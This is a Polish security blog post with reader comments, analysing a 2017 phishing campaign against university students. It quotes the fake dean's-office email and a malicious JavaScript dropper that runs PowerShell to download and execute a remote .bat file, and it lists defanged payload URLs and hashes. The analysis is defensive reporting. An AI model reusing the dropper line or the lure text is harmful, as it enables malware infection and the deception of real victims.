20:30
13/2/2017

Od jednego z czytelników otrzymaliśmy treść wiadomości jaka została dziś rozesłana do bliżej niesprecyzowanej grupy osób (wiemy o ofierze z Uniwersytetu Rolniczego w Krakowie). Poniżej publikujemy treść fałszywej wiadomości:

Subject: Przypomnienie!! – weryfikacja danych na liście studentów
From: Dziekanat dziekanat.kierownik@opoczta.pl
To: dziekanat.kierownik@opoczta.pl dziekanat.kierownik@opoczta.pl
Date: Sat, 11 Feb 2017

Szanowni Państwo,
większość z Państwa jeszcze tego nie zrobiła, więc jeszcze raz proszę o sprawdzenie i zweryfikowanie swoich danych wpisanych na listę studentów na rok akademicki 2016/2017. W przypadku niezgodności danych z rzeczywistością proszę o ich korektę. Poniżej załączam link do pobrania listy studentów z uczelnianego serwera.
Pobierz listę
Jako, że jest to program wczytujący dane z przeglądarki może zostać potraktowany przez niektóre programy antywirusowe jako zagrożenie, należy wtedy dezaktywować program na czas działania programu.
Jeśli pliku nie uda się otworzyć pomimo tego, oznacza to, że Państwa e-mail na który są Państwo zalogowani w przeglądarce nie pasują do żadnego wymienionego na liście, a w związku z tym problem Państwa nie dotyczy.

Jak widzicie, socjotechnika na “najwyższym poziomie” ;-) Słowa “Pobierz listę” są podlinkowane do następującego URL:

hxxps://www.dropbox.com/s/tl1y6f1iqtylq4d/2050e03ca119580f74cca14cc6e97462.js?dl=1

z którego pobierany jest plik .js o nazwie:

2050e03ca119580f74cca14cc6e97462.js

MD5 a76464cd01561e11a835236b7590ead5
SHA1 04a7cb33b9a56d5da2d601448cc2aa03f62c7b82

Plik jest rozpoznawany przez 6/54 antywirusy i zawiera następującą instrukcję:

var d=new ActiveXObject('Shell.KEYLGApplication'.replace('KEYLG',''));d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('LINK','Desktop.bat');Start-Process 'Desktop.bat'","","",0);

LINK to następujący URL:

hxxp://downloadfilenow.website/gateway.php?
download=ZjM5NjVmNDg4MTk5ZGNlMjU1MjUyZTE2YzZj
NGE4ZTU4NWVhMTQyNzQ_YzUwZWQ5NjQ3OGU1ZjVlMjg2M
mIxMGVhOTk_ZTMwYjMyYzRlMjkyOGUyMzFlNTIxZDg5ZW
U1ZTljODAwZThlN2Q4NGVjOWQ2M2M2OGI_YTExOWU1ZTd
mYzZjZGIzNzM4NzM1NDgyM2E3MTdkZDA2MWI3NWUwMzM5
NGRlN2FhMTljZTM_NDg4MDc_NDM1YjlkZjc3Y2Zj

który pobiera trojana, wykrywanego przez 9/55 antywirusów:

2050e03ca119580f74cca14cc6e97462.exe

MD5 e41d2dc76e16fdc6ea1e8cd753a77f85
SHA1 13e469d1d2c1fbb1211489e0449b964ffb0f5f89

Po uruchomieniu, malware dociąga kolejną binarkę:

hxxp://mypanel.website/panel/admin/download/pwd.exe

MD5 f6421a4f570656ada4a6c953bdd3c342
SHA1 6571ad4133ca7425d2cfb4d36c65f7aebe13ed94

Ta jest już doskonale znana antywirusom od 2016 roku.

Atak wygląda na dość mocno sprofilowany, ale niezaawansowany, zbudowany w oparciu o gotowe narzędzia. Jeśli ktoś z Was był odbiorcą niniejszego e-maila, dajcie nam znać. Z chęcią dowiemy się kto poza studentami Uniwersytetu Rolniczego w Krakowie znajdował się w grupie odbiorców niniejszej wiadomości.

Przeczytaj także:

Ten wpis pochodzi z naszego linkbloga *ptr, dlatego nie widać go na głównej.
*ptr możesz czytać przez RSS albo przez sidebar po prawej stronie serwisu.

Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

12 komentarzy

Dodaj komentarz
  1. U nas by taki numer nie przeszedł, wszystkie listy są co najwyżej wywieszane na tablicy przy dziekanacie. Pozdrawiam z pierwszego wydziału w rankingu perspektyw IT 2016 ;)

    • Low-tech approach to security ? Szanuję :)

    • @Denat. Czasami dobrze być zacofanym ;).

    • Czasami dobrze mieć Eresa :)

      Ściślej: listy wiszą przy nieczynnych w zimie schodach za gabinetem dziekana ds. nauczania :)

  2. Wydział Informatyki Stosowanej UJ ??

  3. @Denat, szewc bez butów chodzi. ;)

  4. Jak znam studentów, to większość się nabierze.

  5. Grubymi nićmi szyte, ale plus za poprawność językową. Akurat na poziomie dziekanatowym.

  6. Nie wystarczyłoby, żeby podpisywali maile GnuPG?

    • https://xkcd.com/1181/
      Musiałem.

    • To Microsoft zaczął dodawać do Outlooka GnupG? Nie wiedziałem… xD

      W Androidzie, w googlowym kliencie IMAP i większości innych też GnuPG nie odpalisz, wyjątkiem jest chyba tylko K9Mail.

      Reasumując, nawet jeśli jakiś student wie o istnieniu GnuPG (co już jest dosyć rzadkim zjawiskiem), to i tak nie ma zbyt wielu okazji, żeby taki podpis zweryfikować.

      To by było na tyle

    • Standardem jest S/MIME, teraz w O365 można podpisywać/szyfrować pocztę nawet w webmailu :)

      Różnica między standardem S/MIME a PGP i pochodnymi jest fundamentalna, bo standard korzysta z kryptografii poświadczanej przez zaufane CA, a PGP i pochodne działają z kluczem “własnym” podpisującego, bez uwierzytelniania na poziomie osoby.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: